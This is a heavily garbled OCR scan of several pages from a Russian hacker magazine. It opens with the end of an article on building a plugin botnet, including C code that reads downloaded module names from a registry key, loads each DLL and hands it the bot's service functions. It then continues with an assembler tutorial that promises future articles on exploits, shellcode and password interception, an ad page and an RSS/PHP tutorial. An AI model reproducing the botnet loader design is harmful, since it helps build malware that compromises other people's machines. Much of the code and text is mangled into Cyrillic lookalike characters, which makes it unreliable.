точно громоздкий код, приводить который 
я здесь не буду, но детали объясню. 
Скачать модуль можно с помощью уже 
привычного нам ѴѴіпІпеі АРІ. Но что значит 
«записать в реестре»? Просто информа- 
цию о скачанных модулях надо куда-то 
сохранить, чтобы после перезагрузки сис- 
темы бот не забыл все, чему его так долго 
обучали. Оптимальное место для хранения 
подобной инфы — это реестр. В нем я от- 
вел для наших модулей специальное мес- 
то — ключ НКІ.М \ ЗОЕТѴѴАІЗЕ \ Місгозо іі \ 

И /іпсіоѵѵз \ СиггепіѴегзіоп \ ЬоіМосІиІез. Там 
через точку с запятой будут располагаться 
имена файлов скачанных плагинов для бота. 
Когда бот при старте захочет подгрузить 
свои плагины, ему будет достаточно открыть 
наш ключ с помощью функций работы с ре- 
естром ( ІЗедСгеаіеКеу , НедОиегуѴаІиЕх 
еіс) и пропарсить его содержимое. 

іі (ВедСгеаіеКеу(НКЕѴ_І_ОСАІ__МАСНІІ\ІЕ, 
ВЕѲ_КЕѴ, &Ик)) 
геіигп РАІ_5Е; 

іі(ВедОиегуѴаІиеЕх(Іік, ВЕѲ_ЗІІВКЕѴ, 0, 

0, (І_РВѴТЕ)52ВедЕпігу, &сІѵѵВуіез)) 

{ 

ВедСІозеКеу(іік); 
геіигп РАІ_ЗЕ; 



} 

// получили запись в реестре, парсим 
сРіаг *зер = // разделитель 

сРіаг *1іт; 
сРіаг *іокеп; 

Ііт = згВедЕпігу + ІзігІеп(з 2 ВедЕпігу); 

іокеп = РагзеІпіі(з 2 ВедЕпігу, зер, Ііт); 
іі (Ііокеп) { 

ВедСІозеКеуфк); 
геіигп РАІ_ЗЕ; 

} 

СІО { 

// подгружаю модуль 
НМСЮІІІ_Е Шосіиіе; 

НМосІиІе = І_оасИ_іЬгагу(іокеп); 
іі (ІРіМосІиІе) сопііпие; 

// нахожу функцию 
І_оасІРипсііоп ІпііМосІиІе; 

ІпііМосІиІе = (І_оасІРипсііоп) 
ѲеіРгосАсІсІгеззфМосІиІе, "ІпііМосІиІе 11 ); 

іі (ІІпііМосІиІе) сопііпие; 

// инициализирую модуль 
ІпііМосІиІе(Веді5іегВоіпеіЗегѵісе, 
ѲеіВоіпеіЗегѵісе, 
ІзВоіпеіЗегѵісе, 
ІІпгедізіегВоіпеіЗегѵісе); 

} ѵѵііііе (іокеп = РагзеЗігіпд(іокеп, Ііт)); 

ВедСІозеКеуфк); 

После того как команда /оас/ скачает мо- 
дуль и пропишет его в реестре, она дела- 
ет почти то же самое, что и в этом коде в 
цикле. А именно загружает модуль как 
обычную динамическую библиотеку, нахо- 
дит в ней функцию инициализации и запус- 
кает, не забыв при этом передать адреса 
функций для работы с сервисами. 

[закругляюсь] О реализации плагинного 
ботнета можно писать континуально мно- 
го, но ни одна статья или книга не будет так 
полезна, как исходник. В нем можно само- 
му без малопонятных указаний автора по- 
копаться и во всем разобраться. Поэтому 
полный исходный код бота (в некоторых 
местах даже с комментариями), принципы 
работы которого я пытался объяснить, и 
парочку примеров модулей ты найдешь на 
диске. Если в процессе копания сорца 
или чтения статьи вознинут какие-нибудь 
вопросы — пиши, обязательно отвечу. 
Удачного компилирования. © 




[сорец рГіаіЬоі'а — просто кладезь знаний для ботмастера] 
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ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20ЫЕ РЕВПІІМ НЬЮСЫ 






АззетЫѳг 

Низкоуровневый 

кодинг 

ДОБЫЧА НЕДОКУМЕНТИРОВАННЫХ ФУНК- 
ЦИЙ И ВОЗМОЖНОСТЕЙ ИЗ НЕДР ОПЕРАЦИ- 
ОННОЙ СИСТЕМЫ, СОЗДАНИЕ И ОБЕЗВРЕ- 
ЖИВАНИЕ ВИРУСОВ, АДАПТАЦИЯ ПРИЛОЖЕ- 
НИЙ ПОД СОБСТВЕННЫЕ НУЖДЫ, РАССЕК- 
РЕЧИВАНИЕ АЛГОРИТМОВ И ЗАИМСТВОВА- 
НИЕ ЧУЖИХ ИДЕЙ, ВЗЛОМ ПРИЛОЖЕНИЙ... 
СПИСОК МОЖНО ПРОДОЛЖАТЬ ДО БЕСКО- 
НЕЧНОСТИ. СФЕРА ПРИМЕНЕНИЯ АССЕМБ- 
ЛЕРА НАСТОЛЬКО ШИРОКА, ЧТО СЛОЖНО 
ПРЕДСТАВИТЬ, КАК НЕКОТОРЫЕ ХАКЕРЫ 
БЕЗ НЕГО ОБХОДЯТСЯ. ХАКЕРУ АСМ ПРОС- 
ТО НЕОБХОДИМ. ИМЕННО ПОЭТОМУ В «КО- 
ДИНГЕ» И ПОЯВЛЯЕТСЯ ЭТА НОВАЯ ЗАМЕ- 
ЧАТЕЛЬНАЯ РУБРИКА, ОТКРЫВАЮЩАЯ ДВЕ- 
РИ В УДИВИТЕЛЬНЫЙ МИР, РАСПОЛОЖЕН- 
НЫЙ ЗА ФАСАДОМ ВЫСОКОУРОВНЕВОГО 
ПРОГРАММИРОВАНИЯ I Крис Касперски ака мыщъх 



Учимся программировать на ассемблере 

Ассемблер — мощное оружие, дающее безграничную власть над 
системой. Это седьмое чувство и второе зрение. Когда выскакива- 
ет хорошо известное окошко с воплем о критической ошибке, 
прикладники лишь матерятся и разводят руками — мол, это карма 
у программы такая. Информация об ошибке для них китайская гра- 
мота. Но не для ассемблерщика! Он спокойно идет по указанному 
адресу и правит баг, зачастую даже без потери несохраняемых 
данных! Давай же разберемся, что такое на самом деле этот ас- 
семблер, как им пользовать и как на нем программировать. 

[философия ассемблера] Ассемблер — это низкоуровневый 
язык, оперирующий машинными понятиями и концепциями. Не 
ищи команду вывода строки «НеІІо, \л/огІсИ». Здесь ее нет. В ас- 
ме тебе придется довольствоваться тем, что умеет процес- 
сор. А умеет он вот что: сложить/вычесть/разделить/умно- 
жить/сравнить два числа и в зависимости от полученного ре- 
зультата передать управление на ту или иную ветку програм- 
мы, переслать число с одного места в другое, записать число 
в порт или прочитать его оттуда. Управление периферией, 
кстати, осуществляется именно через порты или через специ- 
альную область памяти (например видеопамять). Чтобы вы- 
вести символ на терминал, необходимо обратиться к техни- 
ческой документации на видеокарту, а чтобы прочитать сек- 
тор с диска — к документации по накопителю. К счастью, эту 
часть работы берут на себя драйверы, и выполнять ее вруч- 
ную обычно не требуется, к тому же в нормальных операцион- 
ных системах, таких, например, как \Л/іпсІо\л/5 І\ІТ, с прикладно- 
го уровня порты вообще недоступны. 

Другой машинной концепцией является регистр. Объяснить, 
что это такое, не погрешив против истины, невозможно. Поэто- 
му вместо того чтобы врубаться в определение (которое на- 
верняка в ужасном виде можно найти в учебниках по асму), 
лучше просто запомнить, что основных регистров на х86 всего 





ш/і/шзт.ги — правильный 
ресурс про программированию 
на асме. 




На диске ты найдешь 
примеры программ и весь 
необходимый софт. 



семь. И прежде чем складывать, вычитать или каким-нибудь 
другим образом манипулировать двумя числами, по крайней 
мере одно из них необходимо загрузить в регистр. Другое же 
может находиться почти где угодно. Хочешь — в оперативке, 
хочешь — в регистре. Регистры предпочтительнее тем, что они 
намного быстрее оперативной памяти, частых обращений к 
которой следует избегать. 

Все эти действия (работа с памятью и т.п.) происходят на арене, 
называемой адресным пространством. Адресное простран- 
ство — это просто совокупность ячеек виртуальной памяти, дос- 
тупной процессору. Операционные системы типа ѴѴіпсІо\л/5 9х и 
большинство *піх-систем создают для каждого приложения 
свой независимый четырехгигабайтный регион, в котором мож- 
но выделить по меньшей мере три области: область кода, об- 
ласть данных и стек. 

Стек — это такой способ хранения данных. Что-то среднее 
между списком и массивом (читайте Кнута, он крут). Команда 
РІІ8Н кладет новую порцию данных на верхушку стека, а ко- 
манда РОР — снимает ее оттуда. Это позволяет сохранять 
данные в памяти, не заботясь об их абсолютных адресах. 
Очень удобно! Вызов функции и возврат из нее происходят как 
раз с помощью этого механизма. Команда САН Іъіпс забра- 
сывает в стек адрес следующей за ней команды, а РЕТ стяги- 
вает его оттуда. Указатель на текущую вершину стека хранит- 
ся в регистре ЕЗР, а дно... формально стек ограничен лишь 
протяженностью адресного пространства, а на самом деле - 
количеством выделенной ему памяти. Направление роста сте- 
ка: от больших адресов — к меньшим. Еще говорят, что он рас- 
тет снизу вверх. 

Вернемся к нашим баранам. Поговорим об основных в х86 ре- 



гистрах. Ты наверняка видел в асм-листингах такие обозначе- 
ния, как ЕАХ, ЕВХ, ЕСХ, ЕОХ, ЕЗІ, ЕО/, — это регистры общего наз- 
начения. Они могут свободно участвовать в любых математи- 
ческих операциях или операциях обращения к памяти. Их все- 
го семь. Семь 32-разрядных регистров. Четыре первых из них 
(ЕАХ, ЕВХ, ЕСХ и ЕЭХ) допускают обращения к своим 16-разряд- 
ным половинкам, хранящим младшее слово, — АХ, ВХ, СХ и ЭХ. 
Каждый из них, в свою очередь, делится на старший и младший 
байты — АН/АІ_, ВН/ВІ_, СН/СІ_ и ОИ/ОІ. Важно понять, что А1_, АХ 
и ЕАХ — это не три разных регистра, а разные части одного и 
того же регистра! 

Регистр же, обозначение которого ты вряд ли мог встретить в лис- 
тинге, — это ЕІР, содержащий указатель на следующую выполня- 
емую команду. Непосредственно он недоступен для модифика- 
ции, но его можно изменить, манипулируя инструкциями перехо- 
да Охх, САН еіс). 

Существуют также и другие регистры — сегментные, мультиме- 
дийные, регистры математического сопроцессора, отладочные 
регистры. Без хорошего справочника в них легко запутаться и уто- 
нуть, и на первых порах мы их касаться не будем. 

[из Си в Асм] Основной ассемблерной командой является МОѴ 
(пересылка данных), которую можно уподобить оператору прис- 
воения. Равенство с = 0x333 из Си на языке ассемблера записы- 
вается примерно как МОѴ ЕАХ , 3330 (обрати внимание на разни- 
цу в записи шестнадцатеричных чисел!). Можно также написать 
МОѴ ЕАХ, ЕВХ (записать в регистр ЕАХ значение регистра ЕВХ). 
Указатели заключаются в квадратные скобки. Сишное о = *Ь на 
ассемблере записывается как МОѴ ЕАХ, (ЕВХ). При желании к 
указателю можно добавить смещение: а = Ь(0х66) эквивалентно 
МОѴ ЕАХ, (ЕВХ + 0x66). 

Переменные объявляются директивами ОВ (переменная в один 
байт), Э\А/ (переменная в одно слово), 00 (переменная в двойное 
слово) и т.д. Знаковость переменных при их объявлении не указывается. 
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[ИНСТРУМЕНТАРИЙ] 

Программируя методом ассемблерных вставок, доста- 
точно иметь компилятор с его ЮЕ (например МісгозоЙ 
ѴізиаІ Зіисііо). Чрезвычайно удобно, что вставки отла- 
живаются точно так же, как и весь остальной высокоу- 
ровневый код. 

Для программ, целиком написанных на ассемблере, 
понадобится транслятор. Под боз'ом большой попу- 
лярностью пользовался пакет ТАЗМ от компании 
ВогІапсІ, но в ѴѴіпсІоѵѵз его позиция выглядит неубеди- 
тельной, и большинство программистов использует 
транслятор МАЗМ от МісгозоК, входящий в состав 
ЭЭК (Эеѵісе Огіѵег КіІ — набор инструментов разра- 
ботчика драйверов). С ним конкурирует некоммерчес- 
кий транслятор РАЗМ (Шр://ТІаіа88етЫеглеТ/), зато- 
ченный под нужды системных программистов и под- 
держивающий более естественный синтаксис языка. 
Существуют ассемблеры и под *піх, например ІМАЗМ, 
входящий в штатный комплект поставки большинства 
дистрибутивов. В общем, какой ассемблер выбрать — 
дело вкуса. 

Прежде чем ассемблированная программа заработает, 
ее необходимо скомпоновать. Для этого вполне подой- 
дет стандартный линкер, выдернутый из той же 



МісгозоІІ ѴізиаІ Зіисііо или РІаіІопп ЗЭК. Из нестанда- 
ртных можно порекомендовать иііпк от Юрия Харона, 
поддерживающий большое количество форматов фай- 
лов и множество тонких настроек, которых другие лин- 
керы крутить не дают. Его можно скачать с сайта фир- 
мы Стикс: 11р://ТТр.з1ух.саЬеІлеТ/риЬ/ІІпіипк/иІпЬХХХХ.іір. 
Для некоммерческого использования он бесплатен. 
Еще нам понадобится отладчик и дизассемблер. От- 
ладчик - это инструмент для поиска ошибок в своих 
собственных приложениях и взламывания чужих. 
ЭеЬиддег’ов много разных: МісгозоІІ ѴізиаІ ЭеЬиддег, 
интегрированный в состав МісгозоІІ ѴізиаІ Зіисііо, 
МісгозоІІ ѴѴіпсІоѵѵз ЭеЬиддег (сокращенно ѴѴЭВ) и 
КегпеІ ЭеЬиддег, входящие в состав ЗЭК и ООК, 
ЗоШсе от ІМиМеда, ОІІуЭЬд от Олега Яшкина и т.д. Са- 
мый мощный — ЗоШсе, самый расширяемый - \ЛЮВ, 
самый простой и неприхотливый — ОІІуЭЬд. Дизассе- 
мблер же нормальный есть только один — это ЮА 
Рго. Другие с ним и рядом не лежали. 

Мелочь типа Иех-редакторов, сравнивателей файлов, 
дамперов памяти, упаковщиков/распаковщиков также 
должна быть все время под рукой. Скачать полный 
комплект необходимого инструментария можно, нап- 
ример, с сайта \л/\л/\л/.\л/азт.ги. 



Если вдруг у тебя возникла необходимость в учебнике по асму, то могу 
порекомендовать: 

Юров «Ассемблер. Учебник», 

Зубков « Ассемблер — язык неограниченных возможностей», 

Ров до «Микропроцессоры от 8086 до Репііит-ІІІ Хеоп и АМР К6-3». 

Одна и та же переменная в различных участках программы может 
интерпретироваться и как число со знаком, и как число без знака. 
Для загрузки переменной в указатель применяется либо команда 
ІЕА, либо МОѴ с директивой оТТзеТ. 

[основные типы пересылок данных] 

І_ЕА ЕОХ,Ь ;// регистр ЕОХ содержит указатель на переменную Ь 
МОѴ ЕВХ,а ;// регистр ЕВХ содержит значение переменной а 
МОѴ ЕСХ, о^зеі а ;// регистр ЕСХ содержит указатель на пере- 
менную а 

МОѴ [ЕОХ], ЕВХ ;// скопировать переменную а в Ь 

МОѴ Ь, ЕВХ ;// скопировать переменную Ь в а 

МОѴ Ь, а ;// Шошибка!!! так делать нельзя!!! 

;// оба аргумента команды МОѴ не могут быть в памяти! 
а 00 661т ;// Іопд а = 0x66; 

Ь 00 ? ;// Іопд Ь; 




Вызов функций на ассемблере реализуется намного сложнее, 
чем на Си. Во-первых, существует по меньшей мере два типа сог- 
лашений передачи функции параметров — Си и Паскаль. В Си- 
соглашении параметры передаются справа налево, а из стека 
их вычищает вызывающий функцию код. В Паскаль-соглашении 
все происходит наоборот! Аргументы передаются слева напра- 
во, а из стека их вычищает сама функция. Большинство АРІ-функ- 
ций ѴѴіпсІоѵѵз придерживаются комбинированного соглашения 
зісісоіі, при котором аргументы заносятся в соответствии с Си- 
соглашением, а из стека вычищаются по соглашению Паскаль. 
Возвращаемое функцией значение помещается в регистр ЕАХ 
(для передачи 64-разрядных значений используется регистровая 
пара Е ЭХ: ЕАХ). Разумеется, этих соглашений необходимо при- 
держиваться только при вызове внешних функций (АРІ, библиотек 
и т.д.). Внутренние функции им следовать не обязаны и могут пе- 
редавать аргументы любым мыслимым способом — к примеру, 
через регистры. 

[вызов АРІ-функции] 

РІІ8Н оГСзеІ иЫМапле ;// засылаем в стек смещение строки 

САН ЬоасіиЬгагу ;// вызов функции 

МОѴ И, ЕАХ ;// ЕАХ содержит возращенное значение 



Теперь перейдем к условным переходам. Никакого ІТ в обычном ассе- 
мблере нет, и эту операцию приходится осуществлять в два этапа. Пер- 
вый — использование команды СМР, которая сравнивает два числа и 
сохранит результат своей работы во флагах. Флаги, кстати, — это биты 
специального регистра, описание которого заняло бы слишком много 
места и поэтому здесь не приводится. Достаточно запомнить три основ- 
ных состояния флагов: меньше (Ьеіоѵѵ или Іезз), больше (аЬоѵе или 
дгеаі) или равно (ециаі). Второй этап — это переход в нужную часть 
программы в зависимости от результатов сравнения. Для этого сущест- 
вует семейство команд условного перехода Зхх. Команды проверяют 
условие «хх» и, если оно истинно, совершают прыжок по указанному ад- 
ресу. Например ЗЕ прыгает, если числа равны Сиітр ЕциаІ), а ЛѴЕ — 
если неравны Ситр І\Іоі ЕциаІ). ЗВ/ЗА работают с беззнаковыми чис- 
лами, а с 31./ЗС — со знаковыми. Любые два не противоречащих друг 
другу условия могут быть скомбинированы друг с другом, например ЗВЕ 
— переход в случае, если одно беззнаковое число меньше или равно 
другому. Безусловный же переход осуществляется командой ЗМР. 
Конструкция СМР/Зхх больше всего похожа на Бейсиковское ІЕ 
ххх СОТО, чем на Си. Вот несколько примеров ее использования: 

[основные типы условных переходов] 



СМР ЕАХ, ЕВХ 
37. ххх 

СМР [ЕСХ], ЕОХ 
ЗАЕ ууу 



;// сравнить ЕАХ и ЕВХ 

;// если они равны переход на ххх 

;// сравнить *ЕСХ и ЕОХ 

;//если беззнаковый *ЕСХ >= ЕОХ перейти на ууу 



[ассемблерные вставки] Как же сложно программировать на чис- 
том ассемблере! Минимально работающая программа содер- 
жит чертову уйму разнообразных конструкций, непонятным обра- 
зом взаимодействующих друг с другом и открывающих огонь без 
предупреждения. Одним махом мы отрезаем себя от привычного 
окружения. Сложить два числа на ассемблере не проблема, но 
вот вывести их результат на экран. . . 

Ассемблерные вставки — другое дело. В то время как классичес- 
кие руководства по асму буквально с первых же строк бросают 
читателя в пучину системного программирования, устрашая его 
сложностью архитектуры процессора и операционной системы, 
ассемблерные вставки оставляют читателя в привычном ему ок- 
ружении языка Си (и/или Паскаля) и постепенно, безо всяких 
резких скачков знакомят с внутренним миром процессора. 

Они позволяют начать изучение ассемблера непосредственно с 
32-разрядного защищенного режима процессора. Дело в том, что 
в чистом виде защищенный режим настолько сложен, что не может 
быть усвоен даже гением, а потому практически все руководства 
начинают изложение ассемблера с описания морально устарев- 
шего 16-разрядного реального режима. Это не только оказывается 
бесполезным балластом, но и замечательным средством запутыва- 
ния ученика (помнишь, «забудьте все, чему вас учили раньше. . .»). 
По своему личному опыту и опыту моих друзей могу сказать, что та- 
кая методика обучения превосходит все остальные как минимум 
по двум категориям: 

Ш Скорость: буквально через три-четыре дня интенсивных заня- 
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[дизассемблер ЮА Рго] 



тий человек, ранее никогда не знавший ассемблера, начинает 
сносно на нем программировать. 

\ 2 \ Легкость усвоения: изучение ассемблера происходит практи- 
чески безо всякого напряжения и усилий. Ученика не заваливают 
ворохом неподъемной и непроходимой информации, каждый 
последующий шаг интуитивно понятен, и с дороги познания забот- 
ливо убраны все потенциальные препятствия. 

Ну так чего же мы ждем? Пора программировать. Для объявле- 
ния ассемблерных вставок в МісгозоіІ ѴізиаІ С++ служит ключе- 
вое слово « а$т», а простейшая ассемблерная программа выг- 

лядит так: 



[вставка, складывающая два числа] 

таіп() 

{ 

іпі а = 1 ; // объявляем переменную а и кладем туда значение 1 
іпі Ь = 2; // объявляем переменную Ь и кладем туда значение 2 
іпі с; // объявляем переменную с, но не инициализируем ее 

азт{ // начало ассемблерной вставки 

плоѵ еах, а ;// загружаем значение переменной а в регистр ЕАХ 
плоѵ еЬх, Ь ;// загружаем значение переменной Ь в регистр ЕВХ 
асісі еах, еЬх ;// складываем ЕАХ с ЕВХ, записывая результат в ЕАХ 
тоѵ с, еах ;// загружаем значение ЕАХ в переменную с 
} // конец ассемблерной вставки 



// выводим содержимое с на экран 

// с помощью привычной для нас функции ргіпіі 

ргіпіі("а + Ь = %х + %х = %х\п", а, Ь, с); 



[о планах на будущее] В следующих статьях этой рубрики мы до- 
кажем, что ассемблер — это не заумная теоретическая муть, а 
самый настоящий хардкор. Самомодифицирующийся код, тех- 
нологии полиморфизма, противодействие отладчикам и дизассе- 
мблерам, экплоиты и зИеІІ-коды, генетически модифицированные 
черви, шпионаж за системными событиями, перехват паролей. 
Это и многое другое станет твоим. 

Изучай ассемблер 0 




[отладчик ОІІу ОеЬиддег] 
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ЧИТАЙТЕ В АПРЕЛЕ: 




Нас не догонят! 

Экстремальный тест программ 
СР5-навигации 



Тестирование новейших 
моделей КПК, ноутбуков и 
сотовых телефонов 



XXI век на связи 

Вся правда о смартфонах НТС 
і-таіе 

Ноутбук ноутбуку рознь 

Пробуем классифицировать 
современные мобильные ПК 

Продолжаем тестировать 

карты памяти и выбирать ВІие- 
іооііт-гарнитуры 

Шаг за шагом 

Меняем жесткий диск в ноутбуке 
Работаем с векторной графикой 
«на ходу» 

Караоке для Роскеі РС 
Планируем рабочее время с 
Адепба Ризіоп 

Выбор хот-спотов для доступа в 
Интернет 

Обучаем детей математике с 
ВиппуМа1:Іі 

Просыпаемся с АІагт Мападег * 
Настраиваем почтовый клиент в 
М$ ЗтагірЬопе 



(дате)іаіШ 








ЮНИТЫ КРЕАТИФФ [КОДИНГ] ІІІЧІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20ЫЕ РЕВВІІМ НЬЮСЫ 
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Препарируем ВЗЗ 

В ПОСЛЕДНЕЕ ВРЕМЯ ВСЕ ПОПУЛЯРНЕЕ СТАНОВЯТСЯ РАЗГОВО- 
РЫ ОБ УНИФИКАЦИИ И СТАНДАРТИЗАЦИИ ИНФОРМАЦИИ, РАСП- 
РОСТРАНЯЕМОЙ В ѴѴЕВ-СРЕДЕ. В САМОМ ДЕЛЕ, ПОРОЙ НЕЛЕГКО 
БЫВАЕТ ОТЫСКАТЬ ЧТО-ТО НУЖНОЕ СРЕДИ ВОРОХА СТРАНИЦ; 
ПОЛЬЗОВАТЕЛИ ВСЕ БОЛЬШЕ УСТАЮТ ОТ НАЗОЙЛИВОЙ РЕКЛА- 
МЫ И НЕКАЧЕСТВЕННОГО ДИЗАЙНА. ПОЭТОМУ В ОПРЕДЕЛЕН- 
НЫЙ МОМЕНТ ПОЯВИЛАСЬ ТЕХНОЛОГИЯ, КОТОРАЯ ПОЗВОЛИЛА 
ПОЛНОСТЬЮ ОТДЕЛИТЬ ТЕКСТОВУЮ ИНФОРМАЦИЮ ОТ ОПРЕДЕ- 
ЛЕННОГО ГРАФИЧЕСКОГО ПРЕДСТАВЛЕНИЯ И ЛЕГКО ОБМЕНИ- 
ВАТЬСЯ ЕЮ, ИЗБЕГАЯ ЛЮБЫХ КОНФЛИКТОВ. СЕГОДНЯ РЕЧЬ 
ПОЙДЕТ КАК РАЗ ОБ ЭТОМ — О СТАНДАРТЕ ВЗЗ. МЫ НАПИШЕМ 
СВОЮ ЛЕНТУ И ПОДУМАЕМ НАД ТЕМ, КАК ИМПОРТИРОВАТЬ ДАН- 
НЫЕ ИЗ ЧУЖИХ БЛОГОВ. ВПЕРЕД! I Никита Кислицин (пікіТо 2 @геаІ.хакер.ги) 






Разбираемся в технологии ВЗЗ 
и пишем свою новостную ленту 

[для чего?] РЗЗ — это технология, которая в силу своего удобства и функцио- 
нальности пришлась по душе миллионам пользователей. Самые крупные ин- 
тернет-проекты уже не скупятся на то, чтобы предоставлять информацию в 
этом формате. За примерами далеко ходить не надо — любой новостной 
сайт экспортирует свои новости в РЗЗ, Яндекс открыл свою собственную, 
очень удобную службу индексирования новостных РЗЗ-лент, и даже в ЖЖ 
давно уже есть возможность читать дневники в этом формате. 

Так что если для тебя аббревиатура Р55 не значит ровным счетом ничего, то 
ты здорово отстал от жизни, и тебе надо обязательно изучать новую техноло- 
гию. Тем более что она проста как два рубля и гениальна как пакет кефира. 
Также присутствие РЗЗ-ленты на любом интернет-проекте делает его весьма 
солидным и здорово отличает от конкурентов. Поэтому если у тебя есть свой 
сайт, на котором ты регулярно размещаешь новые материалы, РЗЗ-лента 
здорово поможет тебе поднять популярность твоего ресурса. И просто сде- 
лает его более качественным, современным и удобным. 






На нашем диске ты найдешь 
исходный код скрипта, гене- 
рирующего ЯЗЗ-ленту, са- 
мопального жЬ ЯЗЗ-клиен- 
та, всю необходимую доку- 
ментацию, а также несколь- 
ко НЗЗ-клиентов под 
И /іпбож. 



По этим адресам ты найдешь 
спецификации ХМІ и ЯЗЗ: 
ШрХ/шшш. шЗ.огд/ТЯ/ЯЕС-хтІ/ 
Шр://Шодз.Іа и /.йагѵагб.еби/ 
іесб/гзз 



В качестве ЯЗЗ-клиента со- 
ветую тебе использовать 
софтину с названием 
АсііѵеЯеІгезй. Ее можно 
найти на нашем диске. 



[что это такое?] Р55 — РеаІІу Зітріе 
Зупсіісаііоп. Какая еще «реально простая 
синдикация», что за бред? :) На самом деле 
все просто. Последнее слово можно пере- 
вести как «приобретение», а всю аббреви- 
атуру как «чрезвычайно простое приобре- 
тение информации». Это такой способ об- 
мена текстовыми данными в \л/еЬ-среде, 
который основывается на том факте, что 
информация на всех сайтах имеет схожую 
структуру и может быть приведена к еди- 
ному формату. 

Как и следовало бы ожидать, Р55 — это язык, 
являющийся подмножеством ХМІ_, и поэтому 
все РЗЗ-документы должны соответствовать 
стандарту ХМІ_ 1.0 ( ѵѵѵѵѵѵ.ѵѵЗ.огд/Ш/НЕС - 
хті). Однако сам стандарт Р55 определен 
на один уровень выше и имеет вполне четкое 
описание, которое я тебе сейчас и приведу 
в сжатом виде. За более строгой специфи- 
кацией советую тебе обратиться к докумен- 
тации, которую ты найдешь на нашем диске. 



[стандарт В55] В своих статьях я уже неоднократно описывал технологию 
ХМІ_, поэтому сегодня не буду останавливаться на ее спецификации и стану 
исходить из того, что ты знаком с ней хотя бы поверхностно и имеешь предс- 
тавление о том, как выглядят хті-документы. 

На верхнем уровне любого РЗЗ-документа находится элемент <Г55>, который 
содержит обязательный атрибут ѵегзіоп, указывающий на версию докумен- 
та. В этой статье я буду описывать версию 2.0, поэтому атрибут ѵегзіоп дол- 
жен иметь соответствующее значение. 

Уровнем ниже от <Г55> лежит элемент <сГюппеІ>, который встречается однаж- 
ды и содержит всю основную информацию об РЗЗ-канале и его содержимом. 
Элемент <сГюппеІ> обязательно имеет в себе троих потомков: ііііе — заголо- 
вок блога, Ііпк — ссылка на соответствующий ленте \л/еЬ-ресурс и сіезсгірііоп 
— описание ленты. 

Внутри этого элемента может присутствовать еще куча тэгов, однако основ- 
ной интерес для нас будут представлять элементы <ііет>, в которых находит- 
ся информация о публикациях. Внутри <ііет> может содержаться большое 
число элементов: ііііе, Ііпк, сіезсгірііоп, саіедогу, соттепіз, епсіозиге, диісі, 
риЬЭаіе и зоигсе. Назначение каждого из этих полей, в общем-то, ясно из 
названий, но чтобы тебе было понятнее, я просто приведу пример небольшо- 
го РЗЗ-документа: 



<?хтІ ѵегзіоп= м 1.0" епсосІіпд= ,, ѵѵіпсІоѵѵз-1251 11 ?> 

<гз5 ѵегзіоп= ,І 2.0 ,І > 

<сІіаппеІ> 

<ШІе>Мои крутые новости</Ш1е> 

<Ііпк>ГіНр://ѵѵѵѵѵѵ.сооІпеѵѵ5.ги</Ііпк> 

<сІезсгірііоп>Офигенные новости из жизни заводчика уругвайских тушка- 
нов.</сІезсгір{іоп> 

<ітаде> 

<игІ>Ііир://ѵѵѵѵѵѵ.сооІпеѵѵз.ги/туІодо.діі</игІ> 

<Ііпк>ГіНр://ѵѵѵѵѵѵ.сооІпеѵѵ5.ги</Ііпк> 

<ШІе>Мои крутые новости</ШІе> 

</ітаде> 

<ІазіВиіІсЮаіе>10 Маг 2005 15:25:46 +0300</ІазіВиіІсЮаіе> 



<Иет> 

<ШІе>У тушкана Кики родилась двойня !</ШІе> 

<Ііпк>И«р://ѵѵѵѵѵѵ.сооІпе\л/з.ги/пеѵѵз.рітр?пісІ=431 2</Ііпк> 

<сІезсгірііоп>Сегодня в пять часов утра у Кики роди- 
лась прекрасная двойня — мальчик и девочка. Вес 
новорожденных составляет, соответственно, 120 и 95 
грамм. </сІезсгірТіоп> 

<риЬОаіе>09 Маг 2005 20:10:09 +0300</риЬОаіе> 

<диісІ>Гіир://ѵѵѵѵѵѵ.сооІпеѵѵз.ги/пеѵѵз.рГір?пісІ=4312</диісІ 

> 

</Иет> 

</сГіаппеІ> 

</Г55> 

Такой вот формат. Обрати внимание: элемент 
<ітаде> позволяет указать соответствующую твоему 
каналу картинку. Что касается остальных неизвест- 
ных тебе тэгов, то знай, что <риЬЭаіе> определяет 
время публикации, а <диіс1> — это уникальный иден- 
тификатор записи, например соответствующий ей 
\л/еЬ-адрес. 

[и что здесь красивого?] Ты, наверное, еще не совсем 
осознал, чем же все это так здорово. Абсолютно сог- 
ласен с тобой: просматривать новости, разглядывая 
тэги хті-документа, не самое романтичное занятие. 
Однако пойми простую вещь: перед просмотром лен- 
та должна быть сформатирована, то есть ее хті- 
представление служит лишь источником необходимой 
информации, а оформление определяется клиен- 
тским приложением, при помощи которого пользова- 
тель просматривает твою ленту. Написать такое при- 
ложение совсем не сложно, и в настоящий момент 
уже создано достаточное количество функциональ- 
ных программ, которые оформляются как самостоя- 
тельно, так и в форме плагинов. 

Сейчас мы с тобой напишем свое собственное \л/еЬ- 
приложение на РНР, которое будет экспортировать 
данные в РЗЗ. 

[перейдем к конкретике] Совсем недавно я получил 
трогательное письмо из одного города в западной 
Сибири, где живет Василий Григорьевич — пенсио- 
нер, который бросил десять лет назад курить, дела- 
ет зарядку по утрам, воспитывает внуков, однако в 
своем преклонном возрасте он решил не жить на 
скромную пенсию, а заняться бизнесом — разведе- 
нием уругвайских тушканов, спрос на которых неп- 
реклонно растет. В определенный момент Василий 
Григорьевич понял, что большая часть его покупате- 
лей активно пользуется инетом и надо предоставить 
ей возможность следить за жизнью питомцев, давать 
рекомендации по Сети, ну и вообще, осуществлять 
электронную поддержку. Внук сделал ему сайт, од- 
нако некоторые клиенты сказали, что им было бы 
удобно следить за новостями, если бы они распро- 
странялись в Р35. 




[ВЗЗ-лента Яндекса] 



[хакер 04 [76] 05 121 ] 



[хакер 04 [76] 05 122 ] 




[добавление славной новости] 




Поскольку внучек ничего об этом не знал, 
Василий Григорьевич попросил меня о 
помощи, и я не смог отказать дедушке. 
Сейчас мы напишем крутой РЗЗ-блог, в 
котором будут поститься новости из жиз- 
ни питомцев Василия Григорьевича. 

[архитектура блога] Да ну какая тут архи- 
тектура. Все просто. В базе данных гпуЗОІ_ 
есть таблица гззЫод, которая имеет следу- 
ющую структуру: 

СВЕАТЕ ТАВІ_Е гззЫод (рісі іп* по* пиІІ ргі- 
тагу кеу аи*о_іпсгетеп*, риЬОаіе сІаТе, 

МІе *ех*, сіезсг *ех*); 

Соответственно, в этой табличке хранятся 
